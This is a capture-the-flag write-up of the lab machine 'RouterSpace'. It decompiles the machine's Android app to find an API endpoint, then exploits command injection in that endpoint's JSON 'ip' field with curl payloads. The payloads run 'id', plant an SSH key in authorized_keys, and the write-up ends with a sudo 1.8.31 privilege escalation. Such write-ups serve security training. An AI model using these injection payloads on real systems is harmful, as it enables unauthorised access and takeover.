
In my opinion, one of the most annoying machines just to set up and the exploits required are quite disappointing.

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 5000 
Starting Nmap 7.93 ( ) at 2023-05-06 10:32 EDT
Nmap scan report for
Host is up (0.017s latency).
Not shown: 65533 filtered tcp ports (no-response)
22/tcp open  ssh
80/tcp open  http

RouterSpace App

Port 80 reveals a page advertising an application:

The intended method is to do dynamic analysis of the machine and run the application in an emulator (which is annoying because anbox is not as easy to install anymore and genymotion doesn't seem to work with my machine).

Instead, I will be doing static analysis to solve it. First, we need to decompile it with apktool.

$ apktool d RouterSpace.apk 
$ cd RouterSpace
$ ls
AndroidManifest.xml  apktool.yml  assets  kotlin  lib  original  res  smali  unknown

With in the assets file, there's an file. This file contains all the JS code used in the entire application, so it's really long but probably has the information I need within it.

Within it, there's this function:

function _0x31d2() {
    var _0x379495 = ['EwCVL', 'ugPGw', 'Router is ', '-Bold', 'data', '30158095HXLvSs', 'post', 'eAgent', 'http://rou', '10BrHGoD', 'gray', '80%', 'applicatio', 'white', 'ck your in', 'ternet con', 'tb/api/v4/', 'Please pro', 'Image', 'XvhFJ', '2111347AIyazK', 'v/check/de', 'vide an IP', 'working fi', 'DKyDg', 'YnNsf', 'tzoEq', 'EKNxl', 'the server', 'log', 'ne!.', 'NunitoSans', 'OgZoU', 'TouchableO', '32457sfggQZ', 'nection.', '[ RESPOND ', 'center', 'createElem', '__esModule', 'per', 'mGNnc', 'then', 'catch', 'contain', 'uAiCt', 'bottom', '42740dmWhFN', 'Text', 'ButtonWrap', 'OLDvc', 'Sorry !', 'terspace.h', 'n/json', 'StyleSheet', '/router/de', 'darkgray', 'JHvFI', 'transparen', 'UWIVj', 'Please che', 'SZqEq', 'default', 'HrHYj', 'Hey !', 'monitoring', 'StatusBar', 'error', '1013605BwxVJG', '[ DEBUG ] ', 'defineProp', 'gUnlE', 'Unable to ', '25%', 'pacity', 'ButtonText', 'gKQYs', '1006000MsdmAT', 'handleSubm', 'PpdRl', 'shxxV', 'ent', 'View', 'erty', 'show', 'Formik', 'Check Stat', '', '128BJBUSC', '6BAxhAU', '4584186MTHGwP', 'connet to ', 'vESlr', 'GHjuW', ' Address.', 'container', 'create', 'RouterSpac', 'viceAccess', '72dIvHGU', 'info'];
    _0x31d2 = function () {
        return _0x379495;
    return _0x31d2();

This looks like a request, and it is to http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess. This means that we can probably access the application from the website. We can see n/json, which means they are probably sending JSON POST requests. We also see, which is looks like an IP address.

$ curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H 'Content-Type: application/json' -H "User-Agent: RouterSpaceAgent" -d '{"ip":""}'

We can test for RCE or injection, and find that RCE works.

$ curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H 'Content-Type: application/json' -H "User-Agent: RouterSpaceAgent" -d '{"ip":";id"}'
"\nuid=1001(paul) gid=1001(paul) groups=1001(paul)\n"

We can get a reverse shell from or we can put our public key into the authorized_keys file.

$ curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H 'Content-Type: application/json' -H "User-Agent: RouterSpaceAgent" -d '{"ip":"; echo ssh-rsa KEY kali@kali > /home/paul/.ssh/authorized_keys"}'

Then, we can ssh in as paul.

Privilege Escalation

Sudo Exploit

This machine is running an outdated version of sudo.

paul@routerspace:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

We can use this repository to exploit it:

Transfer the files over scp.

$ scp * paul@routerspace.htb:~

Then, make and run it to get a root shell.